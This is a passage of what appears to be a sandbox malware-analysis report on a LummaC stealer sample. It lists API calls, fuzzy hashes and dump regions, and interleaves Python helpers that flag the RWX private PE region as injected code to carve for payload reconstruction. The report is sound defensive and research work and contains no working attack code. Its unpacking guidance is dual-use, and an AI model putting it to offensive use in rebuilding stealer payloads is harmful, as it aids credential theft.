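            return "image-code" if self.is_executable() else "image-data"
        if self.is_executable():
            return "private-pe" if self.based_on_pe else "exec-private"
        return "data"


def parse_sdmp_name(name: str, based_on_pe: bool = False) -> DumpRegion:
    """Split an .sdmp file name into its fields under the assumed layout."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    pid, _stage, _seq, base, protect, _f6, mem_type, _f8 = m.groups()
    return DumpRegion(int(pid, 16), int(base, 16), int(protect, 16),
                      int(mem_type, 16), based_on_pe)


def suspicious(entries):
    """Regions whose verdict points at injected or unpacked code."""
    regions = (parse_sdmp_name(n, pe) for n, pe in entries)
    return [r for r in regions if r.verdict() in SUSPICIOUS]


def triage(entries):
    """One summary line per dump, suspicious regions first."""
    regions = [parse_sdmp_name(n, pe) for n, pe in entries]
    regions.sort(key=lambda r: r.verdict() not in SUSPICIOUS)
    return [f"pid {r.pid} base 0x{r.base:08x} {r.protection_name:<22} "
            f"{r.type_name:<11} pe={str(r.based_on_pe):<5} -> "
            f"{r.verdict()}: {VERDICTS[r.verdict()]}" for r in regions]


# Dump names copied from the listing on this page. "based on PE: true" is only
# stated for the two source files; the associated dumps are entered as False.
PAGE_DUMPS = [
    ("00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp", True),
    ("00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp", False),
    ("00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp", False),
    ("00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp", False),
    ("00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp", False),
    ("00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp", False),
    ("00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp", True),
]

if __name__ == "__main__":
    print("\n".join(triage(PAGE_DUMPS)))
```

Run against the seven dump names on this page, `suspicious()` returns exactly one region, the 0x400000 dump, decoded as PAGE_EXECUTE_READWRITE in MEM_PRIVATE memory with a PE header; the six dumps from the 0x2A0000 image classify as ordinary module code and data. The region type is the stronger of the two signals: an RWX page in a MEM_IMAGE section can be a packer unpacking in place, but a PE with no MEM_IMAGE backing was written by something other than the loader, so that is the dump to carve and unpack first when reconstructing the LummaC payload.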
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: 1/3T
                                                                                                                                                                                                                                        • API String ID: 2994545307-3266294232
                                                                                                                                                                                                                                        • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                                                                                                                                                                        • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &tB
                                                                                                                                                                                                                                        • API String ID: 0-268467982
                                                                                                                                                                                                                                        • Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                                                                                                                                                                                        • Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                        • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                                                                                                                                                                        • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RuA
                                                                                                                                                                                                                                        • API String ID: 0-3286949753
                                                                                                                                                                                                                                        • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                        • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: x%
                                                                                                                                                                                                                                        • API String ID: 0-3980080454
                                                                                                                                                                                                                                        • Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                                                                                                                                                                                        • Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1_B
                                                                                                                                                                                                                                        • API String ID: 0-2132359058
                                                                                                                                                                                                                                        • Opcode ID: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                                                                                                                                                                                        • Instruction ID: 5b09de0f708086b2db089408e795921656c95d083517461b5049a84f32a7c51a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8415972D09B7487C230DA64A81017BB6D5DB85310F9A847FF9C697342EB38AD01A7CA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CUUI
                                                                                                                                                                                                                                        • API String ID: 0-173970609
                                                                                                                                                                                                                                        • Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                                                                                                                                                                        • Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6891DF356053118BC718DF1AC890A2BB3F6EF9D710F19996DE8858B391E734EC01CB86
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                                                                                                                                                                                        • Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                                                                                                                                                                                        • Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                                                                                                                                                                        • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                                                                                                                                                                                        • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                                                                                                                                                                        • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                                                                                                                                                                        • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                        • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                                                                                                                                                                        • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
• Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
• Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
• Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
• Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
• Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
• Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
• Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
• Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
• Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
• Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 002A1F53
• RegisterClassW.USER32(?), ref: 002A1F6A
• CreateWindowExW.USER32 ref: 002A1FCA
• GetLastError.KERNEL32 ref: 002A1FD4
• GetMessageW.USER32(Christmas Balls,00000000,00000000,00000000), ref: 002A2000
• GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A203D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Message$ClassCreateErrorHandleLastModuleRegisterWindow
• String ID: Christmas Balls$CreatingTool$Keep low...$[err id]: %i
• API String ID: 91802587-478130180
• Opcode ID: 40934d2cd047d991b8b04560213ce61a56fde0a06b3d4efd548752129299f1d5
• Instruction ID: 9f8c2dbd68fbaabf85c78cdbeef895a99bf713e36508cb3ee2b7f210eec266fb
• Opcode Fuzzy Hash: 40934d2cd047d991b8b04560213ce61a56fde0a06b3d4efd548752129299f1d5
• Instruction Fuzzy Hash: 91419070A28341DFD300DF24D849B2BB7E4BF9A704F00851DF9899B290DB70D954CB92
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 002A20E8
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A20F9
• GetCurrentThreadId.KERNEL32 ref: 002A214A
  • Part of subcall function 002AD0B6: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 002AD0C2
  • Part of subcall function 002AD0B6: GetExitCodeThread.KERNEL32(?,?), ref: 002AD0DB
  • Part of subcall function 002AD0B6: CloseHandle.KERNEL32(?), ref: 002AD0ED
  • Part of subcall function 002B3E7D: CreateThread.KERNEL32(?,?,002B3F95,00000000,?,?), ref: 002B3EC6
  • Part of subcall function 002B3E7D: GetLastError.KERNEL32 ref: 002B3ED2
  • Part of subcall function 002B3E7D: __dosmaperr.LIBCMT ref: 002B3ED9
• GetCurrentThreadId.KERNEL32 ref: 002A21AF
• std::_Throw_Cpp_error.LIBCPMT ref: 002A21E9
• std::_Throw_Cpp_error.LIBCPMT ref: 002A21F0
• std::_Throw_Cpp_error.LIBCPMT ref: 002A21F7
• std::_Throw_Cpp_error.LIBCPMT ref: 002A2204
• std::_Throw_Cpp_error.LIBCPMT ref: 002A2213
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFileLastNameObjectSingleWait__dosmaperr
• String ID:
• API String ID: 686914455-0
• Opcode ID: 51abd89964b6c94acf0f23f89a1543b5fbfd720addfd54f72408664222c07117
• Instruction ID: eea45fd2a52f8132e43a3e1b5d841638d6e9af652e8e0bbbf5f12d74b7488a77
• Opcode Fuzzy Hash: 51abd89964b6c94acf0f23f89a1543b5fbfd720addfd54f72408664222c07117
• Instruction Fuzzy Hash: 1631B3B1A60301BBE720AF659C07B9A77A49F47B40F004419FA4D6A1C5EFB49974CFA3
APIs
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
• Opcode ID: 2a8f19a91fe03e87e8c303ee21eadb2dd9105b5ba38b9cd6a3ef71282da02cf2
• Instruction ID: 45def58a13224a00156af302ea12e99d0ee4744cc8fbcf630a1fe10a7ecd045e
• Opcode Fuzzy Hash: 2a8f19a91fe03e87e8c303ee21eadb2dd9105b5ba38b9cd6a3ef71282da02cf2
• Instruction Fuzzy Hash: 5A71087293120A6FDF219F648C89FAFB7B9EF46310F15031DE908A7142DA759CA4CB51
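The function blocks above follow a fixed layout (API lines with their ref: address, a Memory Dump Source line, then the String ID / Opcode ID / fuzzy-hash fields), and the .sdmp file name is the one field that says where a function was recovered from. The parser below is an added triage helper, not part of this Joe Sandbox report or its tooling. It assumes the .sdmp name is laid out as pid.dump.seq.base.protect.state.type.n.sdmp (inferred from the names shown here, not documented on this page) and labels the protect and type fields with the winnt.h constants, so the functions dumped from 0x400000 (protect 0x40 and type 0x20000, i.e. writable and executable private memory that the sandbox still parsed as a PE) can be separated from the loader's own image mapped at 0x2A0000 (protect 0x20, type 0x1000000). The embedded sample is an excerpt of the blocks above with the Associated, Snapshot and Similarity lines trimmed.

```python
"""Parse the per-function blocks of a Joe Sandbox disassembly report into records.
Added triage helper, not Joe Sandbox code. ASSUMPTION: the .sdmp name is laid out
as pid.dump.seq.base.protect.state.type.n.sdmp (read off the names in this report);
protect/type are labelled with winnt.h values (0x40 PAGE_EXECUTE_READWRITE,
0x20 PAGE_EXECUTE_READ, 0x20000 MEM_PRIVATE, 0x1000000 MEM_IMAGE)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

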